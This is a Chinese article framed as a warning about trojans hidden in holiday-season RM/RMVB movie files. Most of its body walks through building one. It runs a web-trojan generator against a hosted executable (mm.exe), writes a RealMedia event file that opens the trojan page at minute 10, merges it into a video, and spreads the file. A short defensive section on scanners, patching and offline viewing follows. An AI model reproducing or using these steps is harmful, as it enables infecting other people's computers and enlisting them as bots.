狼爱上了羊 警惕木马“恋”上贺岁大片

　　时至岁末，各种各样的贺岁片纷纷出炉，这也是黑客利用夹带网页木马的RM/RMVB电影文件捕捉肉鸡的好时节，许多人纷纷中招。那么黑客是怎么把网页木马加入RM/RMVB电影中的呢?

　　1.RM/RMVB唯一能夹带网页木马的格式

　　在所有电影格式里面，为什么就只有RM/RMVB就夹带网页木马呢?这与该格式的发布者Real公司有关。Real公司允许在RM/RMVB格式的文件里，插入用户设置的任意网页链接来进行广告宣传，当这些网页链接被打开时默认使用的是Real公司的浏览器。

　　可是没想到这种方法，没有给Real公司带来多少实际利益，却为黑客提供了一种方便的网页木马传播手段。只需要将网页木马的链接添加在RM/RMVB里面，当用户打开时就会中招。

　　小提示：其他电影格式就只能用捆绑木马的方式传播。

　　2.网马捆绑RM并不难

　　第一步：制作网页木马

　　首先准备好一个木马的服务端程序，将它上传到网络空间里面，得到一个服务端文件的链接。现在利用最新的MCAfee网页木马生成器来创建一个网页木马。先打开系统的命令提示符窗口，在窗口切换到生成器所在的目录，比如输入“cd d:”就可以进入D盘。

　　接着执行命令：McAfee [生成HTML文件名]，我们按照程序的提示要求输入：McAfee http://www.mm.Com/mm.exe cs.Html(如图1)，既可以在程序目录创建一个网页木马。现在将生成的网页木马上传到网页空间即可。

创建一个网页木马

　　第二步：制作时间文件

　　打开记事本程序，在其中输入下面的一段代码：u 00:10:00.0 00:11:00.0 http://www.mm.Com/cs.Html(如图2)。这段代码的意思是在影片的第10分钟到11分钟的时候，打开后面的“http://www.mm.Com/cs.Html”的这个网页链接，这个网页链接就是我们刚刚设置的网页木马的地址，然后将它保存为一个任意名称的文本文件。

用记事本输入代码

　　第三步：制作网马RM

　　准备一段RM或RMVB视频文件以及相关的视频编辑工具RealMedia Editor。接着启动编辑程序，点击“文件”菜单下的“打开Real媒体文件”命令，来打开准备好的那段RM/RMVB视频文件。

　　然后点击“工具”菜单下的“合并事件”命令，再选择刚才制作的那个文本文件。最后点击“文件”菜单下的“RealMedia文件另存为”命令，对这个合并的文件重新进行另存为操作即可(如图3)。现在将这个恶意的RM文件传播出去，当人们观看这个RM/RMVB文件后，就可能通过网页木马植入木马程序。

制作恶意的RM文件

　　3.防范方法

　　当RM或RMVB文件下载到本队以后，可以通过“超级兔子RM广告清除器”对文件进行扫描。运行“超级兔子RM广告清除器”，在“输入要去除广告的文件名”中选择RM文件，再在“输入新生成的文件名”设置除掉网页广告或木马后的RM文件，然后点击“开始清除”按钮就会进行扫描(如图4)。如果发现广告信息或木马信息，就会自动清除并弹出一个对话框提示用户。其实最简单方法就是下载完成后，断掉网络再进行文件的观看。

功能强大的超级兔子

　　对于那些嵌入到网页中的RM/RMVB文件，首先用户需要安装最新的系统，以及应用程序的补丁程序。这样网页木马就不能激活漏洞来下载安装木马程序，也可以通过IE卫士、金山清理专家、瑞星卡卡的网页木马拦截功能，对这些文件中可能存在的网页木马进行拦截。

　　总结

　　利用RM/RMVB文件进行网页木马传播，已经是一种非常古老的方法了，但是我们不得不承认它的确是非常有效的。在年终，黑客会制作带网页木马的RM/RMVB热门贺岁片，大肆传播，这阵现象将在最近持续一段时间，大家下载电影的时候多留心一下。